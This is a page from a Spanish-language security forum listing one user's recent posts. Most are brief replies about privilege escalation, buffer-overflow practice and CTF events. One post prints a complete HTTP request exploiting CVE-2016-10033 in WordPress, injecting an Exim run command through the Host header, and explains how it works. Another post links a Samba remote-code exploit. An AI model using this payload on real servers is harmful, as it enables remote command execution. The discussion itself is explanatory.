elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 181
1  Seguridad Informática / Bugs y Exploits / Re: Exploit local para escalar privilegios en linux en: 6 Junio 2017, 02:48 am
@CommandPoison, cada exploit funciona de forma distinta.

DirtyCow es de los mas populares, pero hay varios y tendrias que decir cual tienes duda.
2  Seguridad Informática / Bugs y Exploits / Re: Aplicaciones vulnerables a buffer overflow en: 6 Junio 2017, 02:39 am
yashira tiene varios, tienes que registrarte para poder entrar

http://www.yashira.org/index.php?mode=Retos&resp=inforeto&level=126
3  Seguridad Informática / Bugs y Exploits / Re: Aplicaciones vulnerables a buffer overflow en: 6 Junio 2017, 02:35 am
hola giruzgz

si puedes hablar ingles, checate esto: https://github.com/RPISEC/MBE
4  Seguridad Informática / Bugs y Exploits / Re: CVE-2016-10033 WordPress Core - Ejecucion de codigo en: 6 Junio 2017, 02:30 am
El resumen es que si envias esta peticion:
Código:
POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: xenial(tmp1 -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}  tmp2)
Content-Type: application/x-www-form-urlencoded
Content-Length: 56


user_login=admin&redirect_to=&wp-submit=Get+New+Password

Ejecutas /usr/bin/touch en /tmp/test, el bug es que el codigo de wordpress usa:
Código
  1. $phpmailer->setFrom( $from_email, $from_name );

Y como es implementado, ese comando se convierte en:
Código
  1. /usr/sbin/sendmail -t -i -fREMITENTE

Donde REMITENTE proviene del valor del valor de la cabecera Host, como nosotros controlamos la cabezera Host, solo debemos poner algo ahi y podemos controlar que escriba cualquier cosa.

La vulnerabilidad despues se convierte en ejecucion de codigo por medio de EXIM MTA http://www.exim.org/ , que es el servidor de correo instalado por default en Debian y Ubuntu.

Este tiene una opcion que se llama "Expansion Testing Mode", o modo de expansión de prueba, que puede ser usado para que EXIM lea y ejecute comandos en un lenguage propietario. Uno de los comandos es run.

Cuando haces:
Código:
${run{/bin/true}{yes}{no}}

Ejecuta /bin/true.. Facil

El motivo por el cual el exploit es mas complicado es porque la cabecera de Host no permite diagonales ni espacios, por lo que Dawid uso diagnoales y espacios en otras variables disponibles en el ambiente de EXIM.
5  Seguridad Informática / Bugs y Exploits / Re: NSA leak exploits shadow brokers---- AYUDA WINDOS 8 AND WINDOWS SERVER 2012 en: 6 Junio 2017, 02:11 am
cual es el problema que tienes?
6  Seguridad Informática / Bugs y Exploits / Re: Samba RCE CVE-2017-7494 en: 6 Junio 2017, 02:04 am
un exploit https://github.com/omri9741/cve-2017-7494/blob/master/exploit.py
7  Seguridad Informática / Hacking / Re: Puertos en: 6 Junio 2017, 01:59 am
si solo quieres saber los puertos abiertos de tu propia computadora, solo debes usar netstat.

netstat --listening --numeric

deberia ser lo unico que necesitas
8  Seguridad Informática / Hacking / Re: Ayuda usando Hydra en: 6 Junio 2017, 01:57 am
que te dice cuando lo ejecutas?
9  Foros Generales / Foro Libre / Re: Concurso de Google de Captura de Bandera / Capture the Flag en: 4 Junio 2017, 01:27 am
si, hay muchos indios muy buenos :)
10  Foros Generales / Foro Libre / Concurso de Google de Captura de Bandera / Capture the Flag en: 4 Junio 2017, 00:22 am
Hola

Alguien esta planeando participar en el juego de captura de bandera?

Es el  fin de semana del 17 de junio.


https://security.googleblog.com/2017/06/announcing-google-capture-flag-2017.html
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 181
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines